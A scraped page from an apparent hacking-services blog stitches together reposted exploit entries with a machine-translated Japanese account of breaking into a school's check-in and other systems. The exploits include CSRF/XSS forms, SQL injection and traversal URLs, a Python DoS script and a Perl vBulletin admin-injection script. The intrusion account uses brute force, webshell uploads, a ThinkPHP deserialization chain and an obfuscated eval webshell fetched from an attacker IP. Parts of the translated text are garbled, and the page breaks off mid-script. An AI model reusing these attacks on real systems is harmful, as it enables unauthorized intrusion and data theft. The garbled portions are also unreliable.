// source: https://www.securityfocus.com/bid/62261/info
Watchguard Server Center is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers.
Watchguard Server Center 11.7.4 and 11.7.3 are vulnerable; other versions may also be affected.
#include <windows.h>
#define DLL_EXPORT __declspec(dllexport)
#ifdef __cplusplus
extern "C"
{
#endif
void DLL_EXPORT wgpr_library_get()
{
WinExec("calc",0);
}
#ifdef __cplusplus
}
#endif
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863294405
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/62269/info
The Event Easy Calendar plugin for WordPress is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
Event Easy Calendar 1.0.0 is vulnerable; other versions may also be affected.
f of Concept
========================
Add Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="1">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="<script>alert(1)</script>">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="0.00">
<input type="hidden" name="param" value="addNewCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Add Customer">
</form>
Update Customer
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="data-table_length" value="10">
<input type="hidden" name="radioservice" value="2">
<input type="hidden" name="hdServiceTypeDDL" value="">
<input type="hidden" name="uxTxtControl1" value="new () user com">
<input type="hidden" name="uxTxtControl2" value="NewUser">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="hiddeninputname" value="">
<input type="hidden" name="uxHdnTotalCost" value="100.00">
<input type="hidden" name="customerId" value="3">
<input type="hidden" name="uxCustomerEmail" value="new () user com">
<input type="hidden" name="param" value="upDateCustomer">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="Update Customer">
</form>
New Booking
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="altField" value="2013-08-15">
<input type="hidden" name="serviceId" value="2">
<input type="hidden" name="customerId" value="5">
<input type="hidden" name="uxCouponCode" value="">
<input type="hidden" name="uxNotes" value="">
<input type="hidden" name="bookingTime" value="900">
<input type="hidden" name="param" value="frontEndMutipleDates">
<input type="hidden" name="action" value="bookingsLibrary">
<input type="submit" value="New Booking">
</form>
Add Service
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxServiceColor" value="#00ff00">
<input type="text" name="uxServiceName" value="CSRF service<script>alert(1)</script>">
<input type="hidden" name="uxServiceCost" value="0">
<input type="hidden" name="uxServiceType" value="0">
<input type="hidden" name="uxMaxBookings" value="1">
<input type="hidden" name="uxFullDayService" value="">
<input type="hidden" name="uxMaxDays" value="1">
<input type="hidden" name="uxCostType" value="0">
<input type="hidden" name="uxServiceHours" value="00">
<input type="hidden" name="uxServiceMins" value="30">
<input type="hidden" name="uxStartTimeHours" value="9">
<input type="hidden" name="uxStartTimeMins" value="0">
<input type="hidden" name="uxStartTimeAMPM" value="AM">
<input type="hidden" name="uxEndTimeHours" value="5">
<input type="hidden" name="uxEndTimeMins" value="0">
<input type="hidden" name="uxEndTimeAMPM" value="PM">
<input type="hidden" name="param" value="addService">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Service">
</form>
Add Block Out
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxExceptionsServices" value="4">
<input type="hidden" name="uxExceptionsIntervals" value="1">
<input type="hidden" name="uxExceptionsRepeatDay" value="1">
<input type="hidden" name="uxExceptionsStartsOn" value="">
<input type="hidden" name="uxExceptionsStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsDay" value="0">
<input type="hidden" name="uxExceptionsDayEndsOn" value="">
<input type="hidden" name="uxExceptionsWeekDay1" value="Sun">
<input type="hidden" name="uxExceptionsWeekDay2" value="Wed">
<input type="hidden" name="uxExceptionsRepeatWeeks" value="9">
<input type="hidden" name="uxExceptionsWeekStartsOn" value="2013-08-22">
<input type="hidden" name="uxExceptionsWeekStartTimeHours" value="09">
<input type="hidden" name="uxExceptionsWeekStartTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekStartTimeAMPM" value="AM">
<input type="hidden" name="uxExceptionsWeekEndTimeHours" value="05">
<input type="hidden" name="uxExceptionsWeekEndTimeMins" value="00">
<input type="hidden" name="uxExceptionsWeekEndTimeAMPM" value="PM">
<input type="hidden" name="uxExceptionsWeek" value="0">
<input type="hidden" name="uxExceptionsWeekEndsOn" value="">
<input type="hidden" name="param" value="insertExceptionWeeks">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Block Out">
</form>
Add Cupon
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDefaultCoupon" value="XSS<script>alert('xss')</script>">
<input type="hidden" name="uxValidFrom" value="2013-08-15">
<input type="hidden" name="uxValidUpto" value="2013-08-22">
<input type="hidden" name="uxAmount" value="50">
<input type="hidden" name="uxDdlAmountType" value="1">
<input type="hidden" name="uxApplicableOnAllProducts" value="1">
<input type="hidden" name="uxDdlBookingServices" value="4">
<input type="hidden" name="param" value="addCoupons">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Add Cupon">
</form>
Default Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxDdlDefaultCurrency" value="United States Dollar">
<input type="hidden" name="uxDdlDefaultCountry" value="United States of America">
<input type="hidden" name="uxDefaultDateFormat" value="0">
<input type="hidden" name="uxDefaultTimeFormat" value="0">
<input type="hidden" name="uxDefaultTimeZone" value="-5.0">
<input type="hidden" name="uxServiceDisplayFormat" value="0">
<input type="hidden" name="param" value="updateGeneralSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Default Settings">
</form>
Reminder Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxReminderSettings" value="1">
<input type="hidden" name="uxReminderInterval" value="1 hour">
<input type="hidden" name="param" value="UpdateReminderSettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Reminder Settings">
</form>
PayPal Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
Email: <input type="text" name="uxMerchantEmailAddress" placeholder="enter your PayPal email here">
<input type="hidden" name="uxPayPal" value="1">
<input type="hidden" name="uxPayPalUrl" value="https://paypal.com/cgi-bin/webscr";>
<input type="hidden" name="uxThankyouPageUrl" value="http://google.com";>
<input type="hidden" name="uxCancellationUrl" value="http://google.com";>
<input type="hidden" name="param" value="UpdatePaymentGateway">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="PayPal Settings">
</form>
Mailchimp Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxMailChimp" value="1">
<input type="hidden" name="uxMailChimpApiKey" value="12345678">
<input type="hidden" name="uxMailChimpUniqueId" value="87654321">
<input type="hidden" name="uxDoubleOptIn" value="false">
<input type="hidden" name="uxWelcomeEmail" value="false">
<input type="hidden" name="param" value="UpdateAutoResponder">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Mailchimp Settings">
</form>
Facebook Connect
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxFacebookConnect" value="1">
<input type="hidden" name="uxFacebookAppId" value="12345678">
<input type="hidden" name="uxFacebookSecretKey" value="87654321">
<input type="hidden" name="param" value="UpdateFacebookSocialMedia">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Facebook Connect">
</form>
Auto Approve
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="uxAutoApprove" value="1">
<input type="hidden" name="param" value="AutoApprove">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Auto Approve">
</form>
Delete All Bookings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="DeleteAllBookings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Delete All Bookings">
</form>
Restore Factory Settings
<form method="post" action="http://www.example.com/wp-admin/admin-ajax.php";>
<input type="hidden" name="param" value="RestoreFactorySettings">
<input type="hidden" name="action" value="dashboardLibrary">
<input type="submit" value="Restore Factory Settings">
</form>
0x01はじめに
流行により、学校のYibanアプリはチェックインシステムを追加しました。これには、毎日朝の検査と午後の検査が必要です。忘れてしまうと、レビューする何千もの単語があります。
私はこの「形式主義」に深く不満を感じています。私はたまたまサイバーセキュリティチームを設立したので、それを操作する準備をしました。
0x02スポット
基本情報収集についてはあまり言いません
したがって、異なるシステムは複数のサーバーを使用します
それは完全に解決できないようです。コアシステムを獲得するには、さまざまなシステムとサーバーの素晴らしい学校システムの浸透の旅が必要です。
次に、コアシステムにタッチします
まず、「Yiban」システムのホームページを開き、これがどのように見えるかです
開発者がTPフレームワークを使用し、さまざまなTP注射をテストしたことを確認することは難しくありません。
RCEのペイロードは失敗に終わりました、そして、安全性の認識はそれほど悪くないようです
ドメイン名の下のホームページは、機能的なポイントや情報なしで完全にエラー報告ページです
saying sayingにあるように、情報収集の品質は浸透の成功または失敗を直接決定するので、私たちは決して不注意であってはなりません。
最初にファズの第1レベルのディレクトリに来てみましょう
結果は非常に優れており、多くのカタログと機能ポイントがあります。
次に、各第1レベルのディレクトリのセカンダリディレクトリを曖昧にし続け、ドメイン名の下に展開されている機能ポイントを常に探求しました。
第1レベルのディレクトリが多すぎるため、詳細については写真には行きません。
機能的なポイントを理解した後、ズボンを脱いで乾燥を開始します
0x03メンタルヘルスシステムの浸透(IISショートファイル名ポートポート - ブラストニューログインポートアプロード)
第1レベルのカタログを爆破し、爆破します
http://xxx.xxx.edu.cn/psyこのパス
心理教育の健康システムが展開され、ミドルウェアがIISであることがわかった
ただし、メンタルヘルスシステムのログインには検証コードメカニズムがあり、検証コードを識別するのは簡単ではありません
私はすぐにIISショートファイル名機能について考えました
次に、IISショートファイル名ディレクトリスキャンツールを使用します
(https://github.com/lijiejie/iis_shortname_scanner)スキャン用
他のシステムの古いログインポートを取得します
http://xxx.xxx.edu.cn/psy/login2.aspx
図に示されているように、検証コードメカニズムはありません
直接げっぷクラスター爆弾型爆発
他のシステムの弱いパスワード管理者AA123456を正常に取得しました
ただし、古いシステムの他のページが削除されており、通常はバックグラウンドにログインできません
しかし、古いシステムと新しいシステムで使用されているのと同じデータベースが推測されています
新しいシステムへのアクセス
http://xxx.xxx.edu.cn/psy/login.aspx
パスワード管理者、AA123456を使用して、正常にログインします
バックグラウンドでアップロードポイントを検索します
アップロードポイントはです
http://xxx.xxx.edu.cn/psy/scalemanage/scaleedit.aspx?scalelistid=1
スケールプラットフォームに追加されたトピックは、任意のファイルにアップロードされます
(そうです、このアップロードポイント.それは非常に隠されていると言えます.それを見つけるのに長い時間がかかりました)
ASPXのアップロードは不可解にジャンプします。 ASPは解析せず、ASMX馬を直接通過します。
AWVS 10のデバッグモジュールを介してコマンドを実行します
許可はネットサービスです
CobaltStrikeを使用して、PowerShellを直接POWERSHELLに移動します
パッチは死んでいるようです。
さまざまな地元の権利昇進が一度開始されましたが、役に立たなかった
comコンポーネントは、ジャガイモが装着された後も育てることさえできません。最初にこれをしましょう。右を上げる場合は、追加してください。
メンタルヘルスシステムは、初期の買収を発表しました
0x04ライブブロードキャストシステムインターフェイスインジェクション
ライブブロードキャストシステムに入った後、使用する意味がなく、開発はまだ完了していないことがわかりました。
しかし、げっぷで、私はajaxインターフェイスのリクエストを見つけました、
HTTPリクエストは次のように:です
post /index.php/live/index/seat_ajax.html http/1.1
host: xxx.xxx.edu.cn
Content-Length: 24
Accept:/
Origin:http://xxx.xxx.edu.cn
X-Requested With: xmlhttprequest
user-agent: mozilla/5.0(linux; u; android 5.1; zh-cn; 1501_m02 build/lmy47d)applewebkit/534.30(khtml、ygecko)バージョン/4.0 ucbrowser/11.0.0.0.818 U3/0.8.0モバイルSaf/534.30
Content-Type:アプリケーション/x-www-form-urlencoded; charset=utf-8
Referer:http://xxx.xxx.edu.cn/index.php/live/index/seat?place_id=10active_id=20
Accept-Encoding: gzip、deflate
Accept-Language: ZH-CN、ZH; Q=0.9、EN; Q=0.8
Cookie3360 ASP.NET_SESSIONID=S0CLWRGINZ0RW3X0SMTWTSGG; phpsessid=7985bf0a5f38e5922a651ac1f4ef9b1a; phpsessid=7985bf0a5f38e5922a651ac1f4ef9b1a
Connection:閉じます
place_id=10active_id=20
sqliペイロードを見つけるためにファズをします
両方のIDパラメーターには、組合注入があります
ペイロードを構築します
)null、null、null、null、null()、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null - null、null、null、null、null、null、null、
図に示すように、current_user情報が正常に取得されました。
'_root@10.40.0.22
ペイロードを構築します
place_id=10)null、null、null、null、group_concat(schema_name)、null、null、null、null、null、null、null、null、null、null、null、null、null、null、null from information _schema.schemata-- ne neqyactive_id=20
ここでは、他のテーブル、列、データを実証しません。文を書いても大丈夫です、それはとても簡単です。
その後、他のシステムに多くのライブラリが関与していることがわかりましたが、私が最も望んでいたコアシステムのライブラリは見つかりませんでした。
0x05鈍いb64アップロード
ファズ関数ポイントの後、私は許可なしに写真をアップロードできる場所を見つけました
http://xxx.xxx.edu.cn/v4/public/weui/demo/form12.html
data:image/jpegが発見されたときにjpeg画像をアップロードします
データをImage/PHPに直接変更し、アップロードされたコンテンツBase64をエンコードして送信します
GetShellが成功し、システムの許可、権利のエスカレーションが救われました
0x06コアシステム素晴らしい浸透(nday desarialization +コマンド実行バイパス +条件付き競争の膨張)
検索、寒くて捨てられた、悲惨で悲惨な、最終的に「Yiban」を制御するコアシステムを見つけました
http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.update/tree
勝利はあなたの目の前にあります.あなたは眠らないとしても彼を殺さなければなりません
あらゆる種類のファズとさまざまな操作が一緒に配置されましたが、私はそれが役に立たないことがわかりました、そして、私はまだ毎日行きませんでした。
あきらめるべきですか?不可能、これは私たちのスタイルではありません
ページJSを注意深くチェックしていたとき、私はそのような興味深い情報を見つけました
私の目が明るくなりました、いまいましいシンカドミン、前に洗練されたnadがありました、それを手配しましょう!
http://xxx.xxx.edu.cn/v4/public/index.php/admin/login.html?s=admin/api.update/tree
Postdata:
ルール=a%3a2%3a%7bi%3a0%3bo%3a17%3a%22think%5cmodel%5cpivot%22%3a11%3a%7bs%3a21%3a%22%00think%5cmodel%00 lazysave%22% 3a1%3bs%3a19%3a%22%00think%5cmodel%00 exists%22%3bb%3a1%3bs%3a13%3a%22%00think%5cmodel% 2%00%2a%00 -connection%22%3bs%3a5%3a%22Mysql%22%3bs%3a7%3a%22%00%2a%00Name%22%3BO%3a17%3a%22thi nk%5cmodel%5cpivot%22%3a11%3a%7bs%3a21%3a%22%00think%5cmodel%00 lazysave%22%3bb%3a1%3bs%3a19%3a %22%00think%5cmodel%00 Exists%22%3bb%3a1%3bs%3a13%3a%22%00%2a%00connection%22%3bs%3a5%3a%22mys QL%22%3bs%3a7%3a%22%00%2a%00Name%22%3bs%3a0%3a%22%22%3bs%3a21%3a%22%00think%5cmodel%00withattr %22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22System%22%3b%7ds%3a9%3a%22%00%2a%00hidden%22 %3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a3%3a%22123%22%3b%7ds%3a17%3a%22%00think%5cmodel%00data% 22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22whoami%22%3b%7ds%3a12%3a%22%00%2a%00withent %22%3bb%3a0%3bs%3a18%3a%22%00think%5cmodel%00フォース%22%3bb%3a1%3bs%3a8%3a%22%00%2a Ba%3a0%3a%7b%7ds%3a9%3a%22%00%2a%00schema%22%3ba%3a0%3a%7b%7d%7ds%3a21%3a%22%00think%5cmodel% 00 withattr%22%3ba%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22%22%3b%7ds%3a9%3a%22%00%2a%00隠し%22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a3%3a%22123%22%3b%7ds%3a17%3a%22%00think%5cmod EL%00DATA%22%3BA%3a1%3a%7bs%3a4%3a%22test%22%3bs%3a6%3a%22whoami%22%3b%7ds%3a12%3a%22%00%2a%00 withevent%22%3bb%3a0%3bs%3a18%3a%22%00think%5cmodel%00force%22%3bb%3a1%3bs%3a8%3a%22%00%2a%00f IELD%22%3BA%3a0%3a%7b%7ds%3a9%3a%22%00%2a%00schema%22%3ba%3a0%3a%7b%7d%7di%3a1%3bi%3a123%3b%7d //hoamiを実行します
以下は、次のように脱審上のポップチェーンです
?php
名前空間思考;
Think \ model \ pivotを使用してください。
抽象クラスモデル{
private $ lazysave=false; # 保存()
private $が存在する=false; #updatedata()
保護された$接続。
保護された$ name; #__toString()conversion.php=pivot
private $ with withattr=[]; #アサート
保護された$ hidden=[];
private $ data=[];
保護$ withevent=false;
private $ force=false;
保護された$ field=[];
保護された$ schema=[];
function __construct(){
$ this-lazysave=true;
$ this-exists=true;
$ this-withevent=false;
$ this-force=true;
$ this-connection='mysql';
$ this-withattr=['test'='system'];
$ this-data=['test'='whoami'];
$ this-hidden=['test'='123'];
$ this-field=[];
$ this-schema=[];
}
}
名前空間Think \ Model;
Think \ Modelを使用してください。
\#モデルは抽象クラスです。その継承クラスを見つけます。ここでは、ピボットクラスを選択します
クラスピボットはモデルを拡張します{
function __construct($ obj=''){
parent:__construct();
$ this-name=$ obj; #$ This-nameは値をサブクラスコンストラクターに入れ、ベースクラス属性を直接配置して成功せずに初期化します
}
}
$ a=new Pivot();
echo urlencode(serialize([new pivot($ a)、123]));
許可はシステムです、ハハハハハハハ、神も私を助けてくれます
しかし、私はEchoコマンドを使用してシェルを書くことに多くの問題に遭遇しました
コマンドはスペースを持つことができず、シェルはコマンドに直接記述されます。そうしないと、エラーが報告されます。
スペースは +に変換され、バックエンドはそれを認識できません
永続的な手動テストの後、 /\はスペースの限界をバイパスできることがわかります
次に、スプライシングコマンドを使用して、書き込み検出をバイパスすることを実現します
しかし、ターゲットマシンにはWAFがあり、数秒後に通常のウェブシェルが殺されます。
なぜだめですか?条件付き競争を通じて直接殺さずにウェブシェルをダウンロードしてください
コンストラクターは、条件付き競争を通じて殺すことなくシェルをダウンロードします
echo/^^?phps1.phpecho/file_put_contents( 's2.php'、file_get_contents( 'http://49.x.x.x:8080/shell.txt'));^gt; gt; gt; s2.php
シェルの内容は次のとおりです
?php
関数テスト($ php_c0d3){
$ password='skr'; //envpwd
$ cr=preg_filter( '/\ s+/'、 ''、 'c h r');
$ bs64=preg_filter( '/\ s+/'、 ''、 'bas e64 _de cod e');
$ gzi=$ cr(103)。$ cr(122)。$ cr(105)。$ cr(110);
$ gzi。=$ cr(102)。$ cr(108)。$ cr(97)。$ cr(116)。$ cr(101);
$ c=$ bs64($ php_c0d3);
$ c=$ gzi($ c);
@eval($ c);
}
$ php_c0d3='s0lny8xl1vavzkjnyslilc5w11ebuex'。
'5RSMA1RXCKGWZEWM2KVFBROGHRSEH0UOGVLISUC'。
'yztqmiaatumvqspfnny1wqarli1wbpraxi1lleh'。
'a2exrgdszrwaa==';
テスト($ php_c0d3);
?ポップチェーンの降下により、ポストダタを生成します
直接電話してください
http://xxx.xxx.edu.cn/v4/public/s2.php
パスワードSKR
直接取ってください
最後に、このチェックイン、レイトコール、出席コアシステム、管理者がライブラリに入り、管理者のパスワードを復号化しました
くそー、あなたはまだ私にレビューを書いてほしいですか?行ってたわごとを食べてください
source: https://www.securityfocus.com/bid/62313/info
eTransfer Lite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.
Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.
eTransfer Lite 1.0 is vulnerable; other versions may also be affected.
<bq>The following files are hosted live from the iPad's Docs folder.</bq><p><b>Images:<br><br></b>
<a href="http://www.example.com/%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Es2.png"><[PERSISTENT INJECTED SCRIPT
CODE!]">s2.png</a>
( 51.8 Kb, 2013-08-25 02:09:25 +0000)<br />
<a href="a2b642e7de.jpg">a2b642e7de.jpg</a>
( 238.0 Kb, 2013-08-25 02:08:13 +0000)<br />
</p><br><br><br><hr><br><br><br><center><form
action="" method="post" enctype="multipart/form-data" name="form1"
id="form1"><label>Upload file to iPad <input type="file"
name="file" id="file" /></label><label> <input
type="submit" name="button" id="button" value="Submit"
/></label></form></center><br><br><br>Powered
By <a
href=http://www.example.com</a></body></html></iframe></a></p></body></html>
source: https://www.securityfocus.com/bid/62438/info
mukioplayer4wp for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
mukioplayer4wp 1.6 is vulnerable; other versions may also be affected.
http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27
source: https://www.securityfocus.com/bid/62586/info
ShareKM is prone to a denial-of-service vulnerability.
An attacker can exploit this issue to cause the server to crash or disconnect, denying service to legitimate users.
ShareKM 1.0.19 is vulnerable; prior versions may also be affected.
#!/usr/bin/python
import socket
TCP_IP = '192.168.1.100'
TCP_PORT = 55554
BUFFER_SIZE = 1024
MESSAGE = "\x41" * 50000
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TCP_IP, TCP_PORT))
s.send(MESSAGE)
s.close()
#####################################################################################
Application: Acrobat Reader DC
Platforms: Windows
Versions: 15.008.20082.15957
CVE: CVE-2015-7622
Author: Francis Provencher of COSIG
Twitter: @COSIG_
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).[14]
The family comprises Acrobat Reader (formerly Adobe Reader), Acrobat (formerly Acrobat Exchange) and Acrobat.com. Thefreeware Acrobat Reader, available for several desktop and mobile platforms, can view, print and annotate PDF files.[15] Thecommercial proprietary Acrobat, available for Microsoft Windows and OS X only, can also create, edit, convert, digitally sign, encrypt, export and publish PDF files. Acrobat.com complements the family with a variety of enterprise content managementand file hosting services.
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
============================
2) Report Timeline
============================
2015-08-09: Francis Provencher of COSIG found the issue;
2015-08-11: Francis Provencher of COSIG report vulnerability to PSIRT;
2015-10-13: Adobe release a patch (APSB15-24)
#####################################################################################
============================
3) Technical details
============================
An error in the the PDF parser, could lead to a memory corruption when processing a crafted PDF with an invalid image.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/COSIG-2015-001.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38787.zip
###############################################################################
source: https://www.securityfocus.com/bid/62949/info
Ziteman CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/admincss/default.asp
source: https://www.securityfocus.com/bid/62909/info
vBulletin is prone to a security-bypass vulnerability.
Successful exploits can allow attackers to bypass certain security restrictions and perform unauthorized actions.
#!/usr/bin/perl
#
# Title: vBulletin remote admin injection exploit
# Author: Simo Ben youssef
# Contact: Simo_at_Morxploit_com
# Coded: 17 September 2013
# Published: 24 October 2013
# MorXploit Research
# http://www.MorXploit.com
#
# Vendor: vBulletin (www.vbulletin.com)
# Version: 4.1.x / 5.x.x
# Vulnerability: Remote admin injection
# Severity: High
# Status: Confirmed
#
# Exploit code description:
# Perl code to inject a new admin account through upgrade.php script.
#
# Vulnerability details:
# upgrade.php is vulnerable to a new admin account injection, the script doesn't require autentication when upgrading
# it only requires the customer number which can be extracted through the same script source code.
#
# Fix:
# Rename or delete the install folder until a fix is released.
#
# Author disclaimer:
# The information contained in this entire document is for educational, demonstration and testing purposes only.
# Author cannot be held responsible for any malicious use. Use at your own risk.
#
# Exploit usage:
#
# root@MorXploit:/home/simo/morx# perl morxvb.pl localhost
#
# ===================================================
# --- vbulletin admin injection exploit
# --- By: Simo Ben youssef <simo_at_morxploit_com>
# --- MorXploit Research www.MorXploit.com
# ===================================================
# [*] Trying to get customer number ... hold on!
# [+] Got xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!
# [*] Trying to MorXploit localhost ... hold on!
# [+] Admin account successfully injected!
# [+] Admin: MorXploit
# [+] Pass: m0rxpl017
use strict;
use IO::Socket;
if(!defined($ARGV[0])) {
system ('clear');
print "\n";
print "===================================================\n";
print "--- vbulletin admin injection exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
print "--- Usage: perl $0 target\n\n";
exit; }
my $site = $ARGV[0];
##### Change these as needed #####
my $user = "MorXploit";
my $passwd = "m0rxpl017";
my $email = "dev%40null.com";
my $path = "/install/upgrade.php";
##################################
my $accept = "Accept: */*";
my $ct = "application/x-www-form-urlencoded";
my $port = "80";
system ('clear');
print "\n";
print "===================================================\n";
print "--- vbulletin admin injection exploit\n";
print "--- By: Simo Ben youssef <simo_at_morxploit_com>\n";
print "--- MorXploit Research www.MorXploit.com\n";
print "===================================================\n";
my $sock = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to get customer number ... hold on!\n";
print $sock "GET $path HTTP/1.1\n";
print $sock "Host: $site\n";
print $sock "$accept\n";
print $sock "Content-Type: $ct\n";
print $sock "Connection: Close\n\n";
my $gotcn;
while(my $cn = <$sock>) {
if ($cn =~ /CUSTNUMBER = \"(.*?)\"/){
$gotcn = $1;
}
}
if (!defined $gotcn) {
print "[-] Failed to get customer number! Nulled? Going to try anyway!\n";
}
else {
print "[+] Got $gotcn!\n";
}
my $xploit = "ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0
&only=false&customerid=$gotcn&options[skiptemplatemerge]=0&response=yes&
htmlsubmit=1&htmldata[username]=$user&htmldata[password]=$passwd&htmldat
a[confirmpassword]=$passwd&htmldata[email]=$email";
my $cl = length($xploit);
my $content = "Content-Length: $cl";
my $sock2 = new IO::Socket::INET ( PeerAddr => "$site",PeerPort => "$port",Proto => "tcp"); die "\n[-] Can't creat socket: $!\n" unless $sock;
print "[*] Trying to MorXploit $site ... hold on!\n";
print $sock2 "POST $path HTTP/1.1\n";
print $sock2 "Host: $site\n";
print $sock2 "$accept\n";
print $sock2 "Cookie: bbcustomerid=$gotcn\n";
print $sock2 "Content-Length: $cl\n";
print $sock2 "Content-Type: $ct\n";
print $sock2 "Connection: Close\n\n";
print $sock2 "$xploit\n\n";
while(my $result = <$sock2>){
if ($result =~ /Administrator account created/) {
print "[+] Admin account successfully injected!\n";
print "[+] Admin: $user\n";
print "[+] Pass: $passwd\n";
exit;
}
}
print "[-] Failed, something went wrong\n";
exit;
source: https://www.securityfocus.com/bid/62899/info
Open Source SIEM (OSSIM) is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue can allow an attacker to gain access to arbitrary system files. Information harvested may aid in launching further attacks.
Open Source SIEM (OSSIM) 4.3.3 is vulnerable; other versions may also be affected.
http://www.example.com/ossim/ocsreports/tele_compress.php?timestamp=../../../../etc/ossim
source: https://www.securityfocus.com/bid/62876/info
The Woopra Analytics Plugin for WordPress is prone to an arbitrary PHP code-execution vulnerability because it fails to properly validate user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the web server.
<?php
# woopra plugins ~ Exploit
# http://indonesiancoder.com/
#
echo <<<EOT
EOT;
$options = getopt('u:f:');
if(!isset($options['u'], $options['f']))
die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
-u http://target.com/ The full path to Joomla!
-f shell.php The name of the file to create.\n");
$url = $options['u'];
$file = $options['f'];
$shell = "{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
$url = "{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
$data = "<?php eval(\$_GET['cmd']); ?>";
$headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
rv:15.0) Gecko/20100101 Firefox/15.0.1',
'Content-Type: text/plain');
echo " [+] Submitting request to: {$options['u']}\n";
$handle = curl_init();
curl_setopt($handle, CURLOPT_URL, $url);
